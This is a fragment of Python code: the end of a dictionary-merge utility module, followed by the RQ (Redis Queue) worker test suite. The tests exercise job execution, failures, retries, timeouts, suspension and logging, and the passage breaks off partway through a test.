if isinstance(each, six.string_type):
embed_match = False
# Index was not numeric, lets look at any embedded dicts
for embedded in (x for x in data if isinstance(x, dict)):
try:
data = embedded[each]
embed_match = True
break
except KeyError:
pass
if not embed_match:
# No embedded dicts matched
return None
else:
try:
data = data[int(each)]
except IndexError:
return None
else:
try:
data = data[each]
except (KeyError, TypeError):
return None
return data
def dictupdate(dest, upd):
'''
Recursive version of the default dict.update
Merges upd recursively into dest.
'''
recursive_update = True
if (not isinstance(dest, collections.Mapping)) or (
not isinstance(upd, collections.Mapping)
):
raise TypeError('Cannot update using non-dict types in dictupdate.update()')
updkeys = list(upd.keys())
if not set(list(dest.keys())) & set(updkeys):
recursive_update = False
if recursive_update:
for key in updkeys:
val = upd[key]
try:
dest_subkey = dest.get(key, None)
except AttributeError:
dest_subkey = None
if isinstance(dest_subkey, collections.Mapping) and isinstance(
val, collections.Mapping
):
ret = dictupdate(dest_subkey, val)
dest[key] = ret
elif isinstance(dest_subkey, list) and isinstance(val, list):
merged = copy.deepcopy(dest_subkey)
merged.extend([x for x in val if x not in merged])
dest[key] = merged
else:
dest[key] = upd[key]
return dest
else:
try:
for k in upd:
dest[k] = upd[k]
except AttributeError:
# this mapping is not a dict
for k in upd:
dest[k] = upd[k]
return dest
|
test_worker.py | # -*- coding: utf-8 -*-
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import json
import os
import psutil
import shutil
import signal
import subprocess
import sys
import time
import zlib
from datetime import datetime, timedelta, timezone
from multiprocessing import Process
from time import sleep
from unittest import skipIf
import pytest
import mock
from mock import Mock
from tests import RQTestCase, slow
from tests.fixtures import (
access_self, create_file, create_file_after_timeout, create_file_after_timeout_and_setsid, div_by_zero, do_nothing,
kill_worker, long_running_job, modify_self, modify_self_and_error,
run_dummy_heroku_worker, save_key_ttl, say_hello, say_pid, raise_exc_mock,
launch_process_within_worker_and_store_pid
)
from rq import Queue, SimpleWorker, Worker, get_current_connection
from rq.compat import as_text, PY2
from rq.job import Job, JobStatus, Retry
from rq.registry import StartedJobRegistry, FailedJobRegistry, FinishedJobRegistry
from rq.suspension import resume, suspend
from rq.utils import utcnow
from rq.version import VERSION
from rq.worker import HerokuWorker, WorkerStatus
from rq.serializers import JSONSerializer
class CustomJob(Job):
pass
class CustomQueue(Queue):
pass
class TestWorker(RQTestCase):
def test_create_worker(self):
"""Worker creation using various inputs."""
# With single string argument
w = Worker('foo')
self.assertEqual(w.queues[0].name, 'foo')
# With list of strings
w = Worker(['foo', 'bar'])
self.assertEqual(w.queues[0].name, 'foo')
self.assertEqual(w.queues[1].name, 'bar')
self.assertEqual(w.queue_keys(), [w.queues[0].key, w.queues[1].key])
self.assertEqual(w.queue_names(), ['foo', 'bar'])
# With iterable of strings
w = Worker(iter(['foo', 'bar']))
self.assertEqual(w.queues[0].name, 'foo')
self.assertEqual(w.queues[1].name, 'bar')
# Also accept byte strings in Python 2
if PY2:
# With single byte string argument
w = Worker(b'foo')
self.assertEqual(w.queues[0].name, 'foo')
# With list of byte strings
w = Worker([b'foo', b'bar'])
self.assertEqual(w.queues[0].name, 'foo')
self.assertEqual(w.queues[1].name, 'bar')
# With iterable of byte strings
w = Worker(iter([b'foo', b'bar']))
self.assertEqual(w.queues[0].name, 'foo')
self.assertEqual(w.queues[1].name, 'bar')
# With single Queue
w = Worker(Queue('foo'))
self.assertEqual(w.queues[0].name, 'foo')
# With iterable of Queues
w = Worker(iter([Queue('foo'), Queue('bar')]))
self.assertEqual(w.queues[0].name, 'foo')
self.assertEqual(w.queues[1].name, 'bar')
# With list of Queues
w = Worker([Queue('foo'), Queue('bar')])
self.assertEqual(w.queues[0].name, 'foo')
self.assertEqual(w.queues[1].name, 'bar')
# With string and serializer
w = Worker('foo', serializer=json)
self.assertEqual(w.queues[0].name, 'foo')
# With queue having serializer
w = Worker(Queue('foo'), serializer=json)
self.assertEqual(w.queues[0].name, 'foo')
def test_work_and_quit(self):
"""Worker processes work, then quits."""
fooq, barq = Queue('foo'), Queue('bar')
w = Worker([fooq, barq])
self.assertEqual(
w.work(burst=True), False,
'Did not expect any work on the queue.'
)
fooq.enqueue(say_hello, name='Frank')
self.assertEqual(
w.work(burst=True), True,
'Expected at least some work done.'
)
def test_work_and_quit_custom_serializer(self):
"""Worker processes work, then quits."""
fooq, barq = Queue('foo', serializer=JSONSerializer), Queue('bar', serializer=JSONSerializer)
w = Worker([fooq, barq], serializer=JSONSerializer)
self.assertEqual(
w.work(burst=True), False,
'Did not expect any work on the queue.'
)
fooq.enqueue(say_hello, name='Frank')
self.assertEqual(
w.work(burst=True), True,
'Expected at least some work done.'
)
def test_worker_all(self):
"""Worker.all() works properly"""
foo_queue = Queue('foo')
bar_queue = Queue('bar')
w1 = Worker([foo_queue, bar_queue], name='w1')
w1.register_birth()
w2 = Worker([foo_queue], name='w2')
w2.register_birth()
self.assertEqual(
set(Worker.all(connection=foo_queue.connection)),
set([w1, w2])
)
self.assertEqual(set(Worker.all(queue=foo_queue)), set([w1, w2]))
self.assertEqual(set(Worker.all(queue=bar_queue)), set([w1]))
w1.register_death()
w2.register_death()
def test_find_by_key(self):
"""Worker.find_by_key restores queues, state and job_id."""
queues = [Queue('foo'), Queue('bar')]
w = Worker(queues)
w.register_death()
w.register_birth()
w.set_state(WorkerStatus.STARTED)
worker = Worker.find_by_key(w.key)
self.assertEqual(worker.queues, queues)
self.assertEqual(worker.get_state(), WorkerStatus.STARTED)
self.assertEqual(worker._job_id, None)
self.assertTrue(worker.key in Worker.all_keys(worker.connection))
self.assertEqual(worker.version, VERSION)
# If worker is gone, its keys should also be removed
worker.connection.delete(worker.key)
Worker.find_by_key(worker.key)
self.assertFalse(worker.key in Worker.all_keys(worker.connection))
self.assertRaises(ValueError, Worker.find_by_key, 'foo')
def test_worker_ttl(self):
"""Worker ttl."""
w = Worker([])
w.register_birth()
[worker_key] = self.testconn.smembers(Worker.redis_workers_keys)
self.assertIsNotNone(self.testconn.ttl(worker_key))
w.register_death()
def test_work_via_string_argument(self):
"""Worker processes work fed via string arguments."""
q = Queue('foo')
w = Worker([q])
job = q.enqueue('tests.fixtures.say_hello', name='Frank')
self.assertEqual(
w.work(burst=True), True,
'Expected at least some work done.'
)
self.assertEqual(job.result, 'Hi there, Frank!')
self.assertIsNone(job.worker_name)
def test_job_times(self):
"""job times are set correctly."""
q = Queue('foo')
w = Worker([q])
before = utcnow()
before = before.replace(microsecond=0)
job = q.enqueue(say_hello)
self.assertIsNotNone(job.enqueued_at)
self.assertIsNone(job.started_at)
self.assertIsNone(job.ended_at)
self.assertEqual(
w.work(burst=True), True,
'Expected at least some work done.'
)
self.assertEqual(job.result, 'Hi there, Stranger!')
after = utcnow()
job.refresh()
self.assertTrue(
before <= job.enqueued_at <= after,
'Not %s <= %s <= %s' % (before, job.enqueued_at, after)
)
self.assertTrue(
before <= job.started_at <= after,
'Not %s <= %s <= %s' % (before, job.started_at, after)
)
self.assertTrue(
before <= job.ended_at <= after,
'Not %s <= %s <= %s' % (before, job.ended_at, after)
)
def test_work_is_unreadable(self):
"""Unreadable jobs are put on the failed job registry."""
q = Queue()
self.assertEqual(q.count, 0)
# NOTE: We have to fake this enqueueing for this test case.
# What we're simulating here is a call to a function that is not
# importable from the worker process.
job = Job.create(func=div_by_zero, args=(3,), origin=q.name)
job.save()
job_data = job.data
invalid_data = job_data.replace(b'div_by_zero', b'nonexisting')
assert job_data != invalid_data
self.testconn.hset(job.key, 'data', zlib.compress(invalid_data))
# We use the low-level internal function to enqueue any data (bypassing
# validity checks)
q.push_job_id(job.id)
self.assertEqual(q.count, 1)
# All set, we're going to process it
w = Worker([q])
w.work(burst=True) # should silently pass
self.assertEqual(q.count, 0)
failed_job_registry = FailedJobRegistry(queue=q)
self.assertTrue(job in failed_job_registry)
def test_heartbeat(self):
"""Heartbeat saves last_heartbeat"""
q = Queue()
w = Worker([q])
w.register_birth()
self.assertEqual(str(w.pid), as_text(self.testconn.hget(w.key, 'pid')))
self.assertEqual(w.hostname,
as_text(self.testconn.hget(w.key, 'hostname')))
last_heartbeat = self.testconn.hget(w.key, 'last_heartbeat')
self.assertIsNotNone(self.testconn.hget(w.key, 'birth'))
self.assertTrue(last_heartbeat is not None)
w = Worker.find_by_key(w.key)
self.assertIsInstance(w.last_heartbeat, datetime)
# worker.refresh() shouldn't fail if last_heartbeat is None
# for compatibility reasons
self.testconn.hdel(w.key, 'last_heartbeat')
w.refresh()
# worker.refresh() shouldn't fail if birth is None
# for compatibility reasons
self.testconn.hdel(w.key, 'birth')
w.refresh()
@slow
def test_heartbeat_busy(self):
"""Periodic heartbeats while horse is busy with long jobs"""
q = Queue()
w = Worker([q], job_monitoring_interval=5)
for timeout, expected_heartbeats in [(2, 0), (7, 1), (12, 2)]:
job = q.enqueue(long_running_job,
args=(timeout,),
job_timeout=30,
result_ttl=-1)
with mock.patch.object(w, 'heartbeat', wraps=w.heartbeat) as mocked:
w.execute_job(job, q)
self.assertEqual(mocked.call_count, expected_heartbeats)
job = Job.fetch(job.id)
self.assertEqual(job.get_status(), JobStatus.FINISHED)
def test_work_fails(self):
"""Failing jobs are put on the failed queue."""
q = Queue()
self.assertEqual(q.count, 0)
# Action
job = q.enqueue(div_by_zero)
self.assertEqual(q.count, 1)
# keep for later
enqueued_at_date = str(job.enqueued_at)
w = Worker([q])
w.work(burst=True)
# Postconditions
self.assertEqual(q.count, 0)
failed_job_registry = FailedJobRegistry(queue=q)
self.assertTrue(job in failed_job_registry)
self.assertEqual(w.get_current_job_id(), None)
# Check the job
job = Job.fetch(job.id)
self.assertEqual(job.origin, q.name)
self.assertIsNone(job.worker_name) # Worker name is cleared after failures
# Should be the original enqueued_at date, not the date of enqueueing
# to the failed queue
self.assertEqual(str(job.enqueued_at), enqueued_at_date)
self.assertTrue(job.exc_info) # should contain exc_info
def test_horse_fails(self):
"""Tests that job status is set to FAILED even if horse unexpectedly fails"""
q = Queue()
self.assertEqual(q.count, 0)
# Action
job = q.enqueue(say_hello)
self.assertEqual(q.count, 1)
# keep for later
enqueued_at_date = str(job.enqueued_at)
w = Worker([q])
with mock.patch.object(w, 'perform_job', new_callable=raise_exc_mock):
w.work(burst=True) # should silently pass
# Postconditions
self.assertEqual(q.count, 0)
failed_job_registry = FailedJobRegistry(queue=q)
self.assertTrue(job in failed_job_registry)
self.assertEqual(w.get_current_job_id(), None)
# Check the job
job = Job.fetch(job.id)
self.assertEqual(job.origin, q.name)
# Should be the original enqueued_at date, not the date of enqueueing
# to the failed queue
self.assertEqual(str(job.enqueued_at), enqueued_at_date)
self.assertTrue(job.exc_info) # should contain exc_info
def test_statistics(self):
"""Successful and failed job counts are saved properly"""
queue = Queue()
job = queue.enqueue(div_by_zero)
worker = Worker([queue])
worker.register_birth()
self.assertEqual(worker.failed_job_count, 0)
self.assertEqual(worker.successful_job_count, 0)
self.assertEqual(worker.total_working_time, 0)
registry = StartedJobRegistry(connection=worker.connection)
job.started_at = utcnow()
job.ended_at = job.started_at + timedelta(seconds=0.75)
worker.handle_job_failure(job, queue)
worker.handle_job_success(job, queue, registry)
worker.refresh()
self.assertEqual(worker.failed_job_count, 1)
self.assertEqual(worker.successful_job_count, 1)
self.assertEqual(worker.total_working_time, 1.5) # 1.5 seconds
worker.handle_job_failure(job, queue)
worker.handle_job_success(job, queue, registry)
worker.refresh()
self.assertEqual(worker.failed_job_count, 2)
self.assertEqual(worker.successful_job_count, 2)
self.assertEqual(worker.total_working_time, 3.0)
def test_handle_retry(self):
"""handle_job_failure() handles retry properly"""
connection = self.testconn
queue = Queue(connection=connection)
retry = Retry(max=2)
job = queue.enqueue(div_by_zero, retry=retry)
registry = FailedJobRegistry(queue=queue)
worker = Worker([queue])
# If job if configured to retry, it will be put back in the queue
# and not put in the FailedJobRegistry.
# This is the original execution
queue.empty()
worker.handle_job_failure(job, queue)
job.refresh()
self.assertEqual(job.retries_left, 1)
self.assertEqual([job.id], queue.job_ids)
self.assertFalse(job in registry)
# First retry
queue.empty()
worker.handle_job_failure(job, queue)
job.refresh()
self.assertEqual(job.retries_left, 0)
self.assertEqual([job.id], queue.job_ids)
# Second retry
queue.empty()
worker.handle_job_failure(job, queue)
job.refresh()
self.assertEqual(job.retries_left, 0)
self.assertEqual([], queue.job_ids)
# If a job is no longer retries, it's put in FailedJobRegistry
self.assertTrue(job in registry)
def test_retry_interval(self):
"""Retries with intervals are scheduled"""
connection = self.testconn
queue = Queue(connection=connection)
retry = Retry(max=1, interval=5)
job = queue.enqueue(div_by_zero, retry=retry)
worker = Worker([queue])
registry = queue.scheduled_job_registry
# If job if configured to retry with interval, it will be scheduled,
# not directly put back in the queue
queue.empty()
worker.handle_job_failure(job, queue)
job.refresh()
self.assertEqual(job.get_status(), JobStatus.SCHEDULED)
self.assertEqual(job.retries_left, 0)
self.assertEqual(len(registry), 1)
self.assertEqual(queue.job_ids, [])
# Scheduled time is roughly 5 seconds from now
scheduled_time = registry.get_scheduled_time(job)
now = datetime.now(timezone.utc)
self.assertTrue(now + timedelta(seconds=4) < scheduled_time < now + timedelta(seconds=6))
def test_total_working_time(self):
"""worker.total_working_time is stored properly"""
queue = Queue()
job = queue.enqueue(long_running_job, 0.05)
worker = Worker([queue])
worker.register_birth()
worker.perform_job(job, queue)
worker.refresh()
# total_working_time should be a little bit more than 0.05 seconds
self.assertGreaterEqual(worker.total_working_time, 0.05)
# in multi-user environments delays might be unpredictable,
# please adjust this magic limit accordingly in case if It takes even longer to run
self.assertLess(worker.total_working_time, 1)
def test_max_jobs(self):
"""Worker exits after number of jobs complete."""
queue = Queue()
job1 = queue.enqueue(do_nothing)
job2 = queue.enqueue(do_nothing)
worker = Worker([queue])
worker.work(max_jobs=1)
self.assertEqual(JobStatus.FINISHED, job1.get_status())
self.assertEqual(JobStatus.QUEUED, job2.get_status())
def test_disable_default_exception_handler(self):
"""
Job is not moved to FailedJobRegistry when default custom exception
handler is disabled.
"""
queue = Queue(name='default', connection=self.testconn)
job = queue.enqueue(div_by_zero)
worker = Worker([queue], disable_default_exception_handler=False)
worker.work(burst=True)
registry = FailedJobRegistry(queue=queue)
self.assertTrue(job in registry)
# Job is not added to FailedJobRegistry if
# disable_default_exception_handler is True
job = queue.enqueue(div_by_zero)
worker = Worker([queue], disable_default_exception_handler=True)
worker.work(burst=True)
self.assertFalse(job in registry)
def test_custom_exc_handling(self):
"""Custom exception handling."""
def first_handler(job, *exc_info):
job.meta = {'first_handler': True}
job.save_meta()
return True
def second_handler(job, *exc_info):
job.meta.update({'second_handler': True})
job.save_meta()
def black_hole(job, *exc_info):
# Don't fall through to default behaviour (moving to failed queue)
return False
q = Queue()
self.assertEqual(q.count, 0)
job = q.enqueue(div_by_zero)
w = Worker([q], exception_handlers=first_handler)
w.work(burst=True)
# Check the job
job.refresh()
self.assertEqual(job.is_failed, True)
self.assertTrue(job.meta['first_handler'])
job = q.enqueue(div_by_zero)
w = Worker([q], exception_handlers=[first_handler, second_handler])
w.work(burst=True)
# Both custom exception handlers are run
job.refresh()
self.assertEqual(job.is_failed, True)
self.assertTrue(job.meta['first_handler'])
self.assertTrue(job.meta['second_handler'])
job = q.enqueue(div_by_zero)
w = Worker([q], exception_handlers=[first_handler, black_hole,
second_handler])
w.work(burst=True)
# second_handler is not run since it's interrupted by black_hole
job.refresh()
self.assertEqual(job.is_failed, True)
self.assertTrue(job.meta['first_handler'])
self.assertEqual(job.meta.get('second_handler'), None)
def test_cancelled_jobs_arent_executed(self):
"""Cancelling jobs."""
SENTINEL_FILE = '/tmp/rq-tests.txt' # noqa
try:
# Remove the sentinel if it is leftover from a previous test run
os.remove(SENTINEL_FILE)
except OSError as e:
if e.errno != 2:
raise
q = Queue()
job = q.enqueue(create_file, SENTINEL_FILE)
# Here, we cancel the job, so the sentinel file may not be created
self.testconn.delete(job.key)
w = Worker([q])
w.work(burst=True)
assert q.count == 0
# Should not have created evidence of execution
self.assertEqual(os.path.exists(SENTINEL_FILE), False)
@slow # noqa
def test_timeouts(self):
"""Worker kills jobs after timeout."""
sentinel_file = '/tmp/.rq_sentinel'
q = Queue()
w = Worker([q])
# Put it on the queue with a timeout value
res = q.enqueue(create_file_after_timeout,
args=(sentinel_file, 4),
job_timeout=1)
try:
os.unlink(sentinel_file)
except OSError as e:
if e.errno == 2:
pass
self.assertEqual(os.path.exists(sentinel_file), False)
w.work(burst=True)
self.assertEqual(os.path.exists(sentinel_file), False)
# TODO: Having to do the manual refresh() here is really ugly!
res.refresh()
self.assertIn('JobTimeoutException', as_text(res.exc_info))
def test_worker_sets_result_ttl(self):
"""Ensure that Worker properly sets result_ttl for individual jobs."""
q = Queue()
job = q.enqueue(say_hello, args=('Frank',), result_ttl=10)
w = Worker([q])
self.assertIn(job.get_id().encode(), self.testconn.lrange(q.key, 0, -1))
w.work(burst=True)
self.assertNotEqual(self.testconn.ttl(job.key), 0)
self.assertNotIn(job.get_id().encode(), self.testconn.lrange(q.key, 0, -1))
# Job with -1 result_ttl don't expire
job = q.enqueue(say_hello, args=('Frank',), result_ttl=-1)
w = Worker([q])
self.assertIn(job.get_id().encode(), self.testconn.lrange(q.key, 0, -1))
w.work(burst=True)
self.assertEqual(self.testconn.ttl(job.key), -1)
self.assertNotIn(job.get_id().encode(), self.testconn.lrange(q.key, 0, -1))
# Job with result_ttl = 0 gets deleted immediately
job = q.enqueue(say_hello, args=('Frank',), result_ttl=0)
w = Worker([q])
self.assertIn(job.get_id().encode(), self.testconn.lrange(q.key, 0, -1))
w.work(burst=True)
self.assertEqual(self.testconn.get(job.key), None)
self.assertNotIn(job.get_id().encode(), self.testconn.lrange(q.key, 0, -1))
def test_worker_sets_job_status(self):
"""Ensure that worker correctly sets job status."""
q = Queue()
w = Worker([q])
job = q.enqueue(say_hello)
self.assertEqual(job.get_status(), JobStatus.QUEUED)
self.assertEqual(job.is_queued, True)
self.assertEqual(job.is_finished, False)
self.assertEqual(job.is_failed, False)
w.work(burst=True)
job = Job.fetch(job.id)
self.assertEqual(job.get_status(), JobStatus.FINISHED)
self.assertEqual(job.is_queued, False)
self.assertEqual(job.is_finished, True)
self.assertEqual(job.is_failed, False)
# Failed jobs should set status to "failed"
job = q.enqueue(div_by_zero, args=(1,))
w.work(burst=True)
job = Job.fetch(job.id)
self.assertEqual(job.get_status(), JobStatus.FAILED)
self.assertEqual(job.is_queued, False)
self.assertEqual(job.is_finished, False)
self.assertEqual(job.is_failed, True)
def test_job_dependency(self):
"""Enqueue dependent jobs only if their parents don't fail"""
q = Queue()
w = Worker([q])
parent_job = q.enqueue(say_hello, result_ttl=0)
job = q.enqueue_call(say_hello, depends_on=parent_job)
w.work(burst=True)
job = Job.fetch(job.id)
self.assertEqual(job.get_status(), JobStatus.FINISHED)
parent_job = q.enqueue(div_by_zero)
job = q.enqueue_call(say_hello, depends_on=parent_job)
w.work(burst=True)
job = Job.fetch(job.id)
self.assertNotEqual(job.get_status(), JobStatus.FINISHED)
def test_get_current_job(self):
"""Ensure worker.get_current_job() works properly"""
q = Queue()
worker = Worker([q])
job = q.enqueue_call(say_hello)
self.assertEqual(self.testconn.hget(worker.key, 'current_job'), None)
worker.set_current_job_id(job.id)
self.assertEqual(
worker.get_current_job_id(),
as_text(self.testconn.hget(worker.key, 'current_job'))
)
self.assertEqual(worker.get_current_job(), job)
def test_custom_job_class(self):
"""Ensure Worker accepts custom job class."""
q = Queue()
worker = Worker([q], job_class=CustomJob)
self.assertEqual(worker.job_class, CustomJob)
def test_custom_queue_class(self):
"""Ensure Worker accepts custom queue class."""
q = CustomQueue()
worker = Worker([q], queue_class=CustomQueue)
self.assertEqual(worker.queue_class, CustomQueue)
def test_custom_queue_class_is_not_global(self):
"""Ensure Worker custom queue class is not global."""
q = CustomQueue()
worker_custom = Worker([q], queue_class=CustomQueue)
q_generic = Queue()
worker_generic = Worker([q_generic])
self.assertEqual(worker_custom.queue_class, CustomQueue)
self.assertEqual(worker_generic.queue_class, Queue)
self.assertEqual(Worker.queue_class, Queue)
def test_custom_job_class_is_not_global(self):
"""Ensure Worker custom job class is not global."""
q = Queue()
worker_custom = Worker([q], job_class=CustomJob)
q_generic = Queue()
worker_generic = Worker([q_generic])
self.assertEqual(worker_custom.job_class, CustomJob)
self.assertEqual(worker_generic.job_class, Job)
self.assertEqual(Worker.job_class, Job)
def test_work_via_simpleworker(self):
"""Worker processes work, with forking disabled,
then returns."""
fooq, barq = Queue('foo'), Queue('bar')
w = SimpleWorker([fooq, barq])
self.assertEqual(w.work(burst=True), False,
'Did not expect any work on the queue.')
job = fooq.enqueue(say_pid)
self.assertEqual(w.work(burst=True), True,
'Expected at least some work done.')
self.assertEqual(job.result, os.getpid(),
'PID mismatch, fork() is not supposed to happen here')
def test_simpleworker_heartbeat_ttl(self):
"""SimpleWorker's key must last longer than job.timeout when working"""
queue = Queue('foo')
worker = SimpleWorker([queue])
job_timeout = 300
job = queue.enqueue(save_key_ttl, worker.key, job_timeout=job_timeout)
worker.work(burst=True)
job.refresh()
self.assertGreater(job.meta['ttl'], job_timeout)
def test_prepare_job_execution(self):
"""Prepare job execution does the necessary bookkeeping."""
queue = Queue(connection=self.testconn)
job = queue.enqueue(say_hello)
worker = Worker([queue])
worker.prepare_job_execution(job)
# Updates working queue
registry = StartedJobRegistry(connection=self.testconn)
self.assertEqual(registry.get_job_ids(), [job.id])
# Updates worker statuses
self.assertEqual(worker.get_state(), 'busy')
self.assertEqual(worker.get_current_job_id(), job.id)
# job status is also updated
self.assertEqual(job._status, JobStatus.STARTED)
self.assertEqual(job.worker_name, worker.name)
def test_prepare_job_execution_inf_timeout(self):
"""Prepare job execution handles infinite job timeout"""
queue = Queue(connection=self.testconn)
job = queue.enqueue(long_running_job,
args=(1,),
job_timeout=-1)
worker = Worker([queue])
worker.prepare_job_execution(job)
# Updates working queue
registry = StartedJobRegistry(connection=self.testconn)
self.assertEqual(registry.get_job_ids(), [job.id])
# Score in queue is +inf
self.assertEqual(self.testconn.zscore(registry.key, job.id), float('Inf'))
def test_work_unicode_friendly(self):
"""Worker processes work with unicode description, then quits."""
q = Queue('foo')
w = Worker([q])
job = q.enqueue('tests.fixtures.say_hello', name='Adam',
description='你好 世界!')
self.assertEqual(w.work(burst=True), True,
'Expected at least some work done.')
self.assertEqual(job.result, 'Hi there, Adam!')
self.assertEqual(job.description, '你好 世界!')
def test_work_log_unicode_friendly(self):
"""Worker process work with unicode or str other than pure ascii content,
logging work properly"""
q = Queue("foo")
w = Worker([q])
job = q.enqueue('tests.fixtures.say_hello', name='阿达姆',
description='你好 世界!')
w.work(burst=True)
self.assertEqual(job.get_status(), JobStatus.FINISHED)
job = q.enqueue('tests.fixtures.say_hello_unicode', name='阿达姆',
description='你好 世界!')
w.work(burst=True)
self.assertEqual(job.get_status(), JobStatus.FINISHED)
def test_suspend_worker_execution(self):
"""Test Pause Worker Execution"""
SENTINEL_FILE = '/tmp/rq-tests.txt' # noqa
try:
# Remove the sentinel if it is leftover from a previous test run
os.remove(SENTINEL_FILE)
except OSError as e:
if e.errno != 2:
raise
q = Queue()
q.enqueue(create_file, SENTINEL_FILE)
w = Worker([q])
suspend(self.testconn)
w.work(burst=True)
assert q.count == 1
# Should not have created evidence of execution
self.assertEqual(os.path.exists(SENTINEL_FILE), False)
resume(self.testconn)
w.work(burst=True)
assert q.count == 0
self.assertEqual(os.path.exists(SENTINEL_FILE), True)
@slow
def test_suspend_with_duration(self):
q = Queue()
for _ in range(5):
q.enqueue(do_nothing)
w = Worker([q])
# This suspends workers for working for 2 second
suspend(self.testconn, 2)
# So when this burst of work happens the queue should remain at 5
w.work(burst=True)
assert q.count == 5
sleep(3)
# The suspension should be expired now, and a burst of work should now clear the queue
w.work(burst=True)
assert q.count == 0
def test_worker_hash_(self):
"""Workers are hashed by their .name attribute"""
q = Queue('foo')
w1 = Worker([q], name="worker1")
w2 = Worker([q], name="worker2")
w3 = Worker([q], name="worker1")
worker_set = set([w1, w2, w3])
self.assertEqual(len(worker_set), 2)
def test_worker_sets_birth(self):
"""Ensure worker correctly sets worker birth date."""
q = Queue()
w = Worker([q])
w.register_birth()
birth_date = w.birth_date
self.assertIsNotNone(birth_date)
self.assertEqual(type(birth_date).__name__, 'datetime')
def test_worker_sets_death(self):
"""Ensure worker correctly sets worker death date."""
q = Queue()
w = Worker([q])
w.register_death()
death_date = w.death_date
self.assertIsNotNone(death_date)
self.assertIsInstance(death_date, datetime)
def test_clean_queue_registries(self):
"""worker.clean_registries sets last_cleaned_at and cleans registries."""
foo_queue = Queue('foo', connection=self.testconn)
foo_registry = StartedJobRegistry('foo', connection=self.testconn)
self.testconn.zadd(foo_registry.key, {'foo': 1})
self.assertEqual(self.testconn.zcard(foo_registry.key), 1)
bar_queue = Queue('bar', connection=self.testconn)
bar_registry = StartedJobRegistry('bar', connection=self.testconn)
self.testconn.zadd(bar_registry.key, {'bar': 1})
self.assertEqual(self.testconn.zcard(bar_registry.key), 1)
worker = Worker([foo_queue, bar_queue])
self.assertEqual(worker.last_cleaned_at, None)
worker.clean_registries()
self.assertNotEqual(worker.last_cleaned_at, None)
self.assertEqual(self.testconn.zcard(foo_registry.key), 0)
self.assertEqual(self.testconn.zcard(bar_registry.key), 0)
# worker.clean_registries() only runs once every 15 minutes
# If we add another key, calling clean_registries() should do nothing
self.testconn.zadd(bar_registry.key, {'bar': 1})
worker.clean_registries()
self.assertEqual(self.testconn.zcard(bar_registry.key), 1)
def test_should_run_maintenance_tasks(self):
"""Workers should run maintenance tasks on startup and every hour."""
queue = Queue(connection=self.testconn)
worker = Worker(queue)
self.assertTrue(worker.should_run_maintenance_tasks)
worker.last_cleaned_at = utcnow()
self.assertFalse(worker.should_run_maintenance_tasks)
worker.last_cleaned_at = utcnow() - timedelta(seconds=3700)
self.assertTrue(worker.should_run_maintenance_tasks)
def test_worker_calls_clean_registries(self):
"""Worker calls clean_registries when run."""
queue = Queue(connection=self.testconn)
registry = StartedJobRegistry(connection=self.testconn)
self.testconn.zadd(registry.key, {'foo': 1})
worker = Worker(queue, connection=self.testconn)
worker.work(burst=True)
self.assertEqual(self.testconn.zcard(registry.key), 0)
def test_job_dependency_race_condition(self):
"""Dependencies added while the job gets finished shouldn't get lost."""
# This patches the enqueue_dependents to enqueue a new dependency AFTER
# the original code was executed.
orig_enqueue_dependents = Queue.enqueue_dependents
def new_enqueue_dependents(self, job, *args, **kwargs):
orig_enqueue_dependents(self, job, *args, **kwargs)
if hasattr(Queue, '_add_enqueue') and Queue._add_enqueue is not None and Queue._add_enqueue.id == job.id:
Queue._add_enqueue = None
Queue().enqueue_call(say_hello, depends_on=job)
Queue.enqueue_dependents = new_enqueue_dependents
q = Queue()
w = Worker([q])
with mock.patch.object(Worker, 'execute_job', wraps=w.execute_job) as mocked:
parent_job = q.enqueue(say_hello, result_ttl=0)
Queue._add_enqueue = parent_job
job = q.enqueue_call(say_hello, depends_on=parent_job)
w.work(burst=True)
job = Job.fetch(job.id)
self.assertEqual(job.get_status(), JobStatus.FINISHED)
# The created spy checks two issues:
# * before the fix of #739, 2 of the 3 jobs where executed due
# to the race condition
# * during the development another issue was fixed:
# due to a missing pipeline usage in Queue.enqueue_job, the job
# which was enqueued before the "rollback" was executed twice.
# So before that fix the call count was 4 instead of 3
self.assertEqual(mocked.call_count, 3)
def test_self_modification_persistence(self):
"""Make sure that any meta modification done by
the job itself persists completely through the
queue/worker/job stack."""
q = Queue()
# Also make sure that previously existing metadata
# persists properly
job = q.enqueue(modify_self, meta={'foo': 'bar', 'baz': 42},
args=[{'baz': 10, 'newinfo': 'waka'}])
w = Worker([q])
w.work(burst=True)
job_check = Job.fetch(job.id)
self.assertEqual(job_check.meta['foo'], 'bar')
self.assertEqual(job_check.meta['baz'], 10)
self.assertEqual(job_check.meta['newinfo'], 'waka')
def test_self_modification_persistence_with_error(self):
"""Make sure that any meta modification done by
the job itself persists completely through the
queue/worker/job stack -- even if the job errored"""
q = Queue()
# Also make sure that previously existing metadata
# persists properly
job = q.enqueue(modify_self_and_error, meta={'foo': 'bar', 'baz': 42},
args=[{'baz': 10, 'newinfo': 'waka'}])
w = Worker([q])
w.work(burst=True)
# Postconditions
self.assertEqual(q.count, 0)
failed_job_registry = FailedJobRegistry(queue=q)
self.assertTrue(job in failed_job_registry)
self.assertEqual(w.get_current_job_id(), None)
job_check = Job.fetch(job.id)
self.assertEqual(job_check.meta['foo'], 'bar')
self.assertEqual(job_check.meta['baz'], 10)
self.assertEqual(job_check.meta['newinfo'], 'waka')
@mock.patch('rq.worker.logger.info')
def test_log_result_lifespan_true(self, mock_logger_info):
"""Check that log_result_lifespan True causes job lifespan to be logged."""
q = Queue()
w = Worker([q])
job = q.enqueue(say_hello, args=('Frank',), result_ttl=10)
w.perform_job(job, q)
mock_logger_info.assert_called_with('Result is kept for %s seconds', 10)
self.assertIn('Result is kept for %s seconds', [c[0][0] for c in mock_logger_info.call_args_list])
@mock.patch('rq.worker.logger.info')
def test_log_result_lifespan_false(self, mock_logger_info):
"""Check that log_result_lifespan False causes job lifespan to not be logged."""
q = Queue()
class TestWorker(Worker):
log_result_lifespan = False
w = TestWorker([q])
job = q.enqueue(say_hello, args=('Frank',), result_ttl=10)
w.perform_job(job, q)
self.assertNotIn('Result is kept for 10 seconds', [c[0][0] for c in mock_logger_info.call_args_list])
@mock.patch('rq.worker.logger.info')
def test_log_job_description_true(self, mock_logger_info):
"""Check that log_job_description True causes job lifespan to be logged."""
q = Queue()
w = Worker([q])
q.enqueue(say_hello, args=('Frank',), result_ttl=10)
w.dequeue_job_and_maintain_ttl(10)
self.assertIn("Frank", mock_logger_info.call_args[0][2])
@mock.patch('rq.worker.logger.info')
def test_log_job_description_false(self, mock_logger_info):
